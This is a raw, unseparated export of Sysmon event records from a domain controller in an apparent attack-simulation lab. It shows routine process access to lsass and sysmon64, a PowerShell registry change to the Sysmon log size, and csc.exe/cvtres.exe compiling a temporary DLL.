C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.747{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x8000000000000000293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:18.622{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\MaxSizeDWORD (0x12d2c000) 10341000x8000000000000000292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.575{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.575{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.575{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x8000000000000000289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:18.294{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\fdypqgxp.dll2021-01-18 13:33:18.200 10341000x8000000000000000288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1E-6005-C902-00000000A201}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.294{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1E-6005-C902-00000000A201}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.294{59A5CD1D-8E1E-6005-C802-00000000A201}37083928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{59A5CD1D-8E1E-6005-C902-00000000A201}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x8000000000000000276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.298{59A5CD1D-8E1E-6005-C902-00000000A201}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESDCE.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC69DCE030F8894AC8949CBC1BB0885F81.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\fdypqgxp.cmdline" 10341000x8000000000000000275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
